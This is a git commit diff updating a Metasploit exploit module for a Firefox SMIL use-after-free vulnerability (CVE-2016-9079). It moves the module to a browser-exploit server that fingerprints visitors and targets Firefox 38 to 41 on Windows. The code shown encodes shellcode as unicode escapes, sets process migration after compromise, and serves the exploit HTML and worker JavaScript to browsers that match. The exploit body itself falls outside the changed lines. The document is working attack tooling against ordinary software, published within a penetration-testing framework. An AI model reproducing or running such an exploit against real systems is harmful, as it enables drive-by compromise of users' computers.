Land #7895, Update firefox_uaf_smil to use BrowserExploitServer

bug/bundler_fix
William Webb 2017-02-01 16:42:39 -06:00
commit b4a9bfc7a9
No known key found for this signature in database
GPG Key ID: 341763D0308DA650
1 changed files with 19 additions and 23 deletions


@ -8,7 +8,7 @@ require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -25,9 +25,17 @@ require 'msf/core'
'William Webb <william_webb[at]rapid7.com>' # Metasploit module 'William Webb <william_webb[at]rapid7.com>' # Metasploit module
], ],
'Platform' => 'win', 'Platform' => 'win',
'BrowserRequirements' =>
{
source: /script/i,
os_name: OperatingSystems::Match::WINDOWS,
ua_name: HttpClients::FF,
# Fixed in Firefox 50.0.2
ua_ver: lambda { |ver| ver.to_i.between?(38, 41) }
},
'Targets' => 'Targets' =>
[ [
[ 'Mozilla Firefox', [ 'Mozilla Firefox 38 to 41',
{ {
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
@ -40,11 +48,11 @@ require 'msf/core'
'InitialAutoRunScript' => 'migrate -f' 'InitialAutoRunScript' => 'migrate -f'
}, },
'References' => 'References' =>
[ [
[ 'CVE', '2016-9079' ], [ 'CVE', '2016-9079' ],
[ 'Bugzilla', '1321066' ] [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1321066' ],
], [ 'URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/' ]
'Arch' => ARCH_X86, ],
'DisclosureDate' => "Nov 30 2016", 'DisclosureDate' => "Nov 30 2016",
'DefaultTarget' => 0 'DefaultTarget' => 0
) )
@ -60,7 +68,7 @@ require 'msf/core'
p = payload.encoded p = payload.encoded
arch = Rex::Arch.endian(target.arch) arch = Rex::Arch.endian(target.arch)
payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u') payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
base_uri = "#{get_resource.chomp('/')}" base_uri = get_module_resource
# stuff that gets adjusted alot during testing # stuff that gets adjusted alot during testing
@ -248,28 +256,16 @@ require 'msf/core'
send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' }) send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
end end
def is_ff_on_windows(user_agent) def on_request_exploit(cli, request, browser_info)
target_hash = fingerprint_user_agent(user_agent)
if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
return false
end
return true
end
def on_request_uri(cli, request)
print_status("Got request: #{request.uri}") print_status("Got request: #{request.uri}")
print_status("From: #{request.headers['User-Agent']}") print_status("From: #{request.headers['User-Agent']}")
if (!is_ff_on_windows(request.headers['User-Agent']))
print_error("Unsupported user agent: #{request.headers['User-Agent']}")
send_not_found(cli)
close_client(cli)
return
end
if request.uri =~ /worker\.js/ if request.uri =~ /worker\.js/
print_status("Sending worker thread Javascript ...") print_status("Sending worker thread Javascript ...")
worker_js(cli) worker_js(cli)
return return
end end
if request.uri =~ /index\.html/ or request.uri =~ /\// if request.uri =~ /index\.html/ or request.uri =~ /\//
print_status("Sending exploit HTML ...") print_status("Sending exploit HTML ...")